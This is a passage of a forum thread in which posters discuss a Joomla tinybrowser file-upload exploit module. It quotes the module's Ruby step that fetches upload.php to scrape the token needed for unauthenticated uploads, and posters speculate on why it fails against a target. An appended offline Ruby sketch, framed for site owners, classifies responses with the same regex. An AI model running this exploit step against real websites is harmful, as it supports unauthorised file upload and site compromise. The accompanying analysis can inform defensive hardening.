ASK ABOUT JOOMSCAN.PL
#31
Try to understand it first from the exploit's source code, in this part:

Code:
# Get obfuscation code (needed to upload files)
obfuscation_code = nil
res = send_request_raw({
    'uri'     => datastore['URI'] + tinybrowserpath + '/upload.php?type=file&folder='
}, 25)

if (res)

    if(res.body =~ /"obfus", "((\w)+)"\)/)
        obfuscation_code = $1
        print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")
    else
        print_error("Error retrieving obfuscation code!")
        return
    end
end

If you look at this part:
Quote:
res = send_request_raw({
    'uri' => datastore['URI'] + tinybrowserpath + '/upload.php?type=file&folder='

the stored target URL + the tinybrowser location + its upload.php file = exploit code

This exploit code is then obfuscated so that it is hard for the WAF or the web filter to read.

But I still don't understand why it can't get the obfuscation code.

Maybe some of the others here know?

#32
(03-29-2012, 02:52 AM)konspirasi Wrote: Try to understand it first from the exploit's source code, in this part:

Code:
# Get obfuscation code (needed to upload files)
obfuscation_code = nil
res = send_request_raw({
    'uri'     => datastore['URI'] + tinybrowserpath + '/upload.php?type=file&folder='
}, 25)

if (res)

    if(res.body =~ /"obfus", "((\w)+)"\)/)
        obfuscation_code = $1
        print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")
    else
        print_error("Error retrieving obfuscation code!")
        return
    end
end

If you look at this part:
Quote:
res = send_request_raw({
    'uri' => datastore['URI'] + tinybrowserpath + '/upload.php?type=file&folder='

the stored target URL + the tinybrowser location + its upload.php file = exploit code

This exploit code is then obfuscated so that it is hard for the WAF or the web filter to read.

But I still don't understand why it can't get the obfuscation code.

Maybe some of the others here know?

In my opinion it is because of "Restricted access".
The conclusion is: Joomla is NOT vulnerable, exiting.

The explanation is the same as in my post above.

Does anyone have a different opinion?
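Added example (not part of either post and not code from the module): an offline Ruby sketch that applies the regex from the quoted excerpt to response bodies, so a site owner can see which of the cases discussed above a given upload.php response falls into. The function names and the sample bodies are constructed for illustration; note that in the excerpt a missing response (`res` is nil) prints nothing at all.

```ruby
# Regex copied verbatim from the module excerpt quoted in the thread.
OBFUS_RE = /"obfus", "((\w)+)"\)/

# Classify the body returned by upload.php (nil = no response received).
# Returns [status, token_or_nil]. Hypothetical helper, not a Metasploit API.
def classify_upload_response(body)
  return [:no_response, nil] if body.nil?

  if (m = OBFUS_RE.match(body))
    # The page handed out its token without authentication.
    return [:token_exposed, m[1]]
  end

  # The string the second poster reports seeing.
  return [:restricted, nil] if body.include?('Restricted access')

  # A response arrived but carries no token: the excerpt's
  # "Error retrieving obfuscation code!" branch.
  [:no_token, nil]
end

# Constructed sample bodies (not captured from a real site).
SAMPLES = {
  'exposed'    => %q{<script>so.addVariable("obfus", "a1b2c3d4e5");</script>},
  'restricted' => 'Restricted access',
  'other'      => '<html><body>404 Not Found</body></html>',
  'timeout'    => nil
}

# Returns one [name, status, token] row per sample.
def report(samples = SAMPLES)
  samples.map { |name, body| [name, *classify_upload_response(body)] }
end

if __FILE__ == $0
  report.each { |name, status, token| puts "#{name}: #{status} #{token}" }
end
```

Only the `:token_exposed` case means the upload page is reachable without a login and should be locked down or removed.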
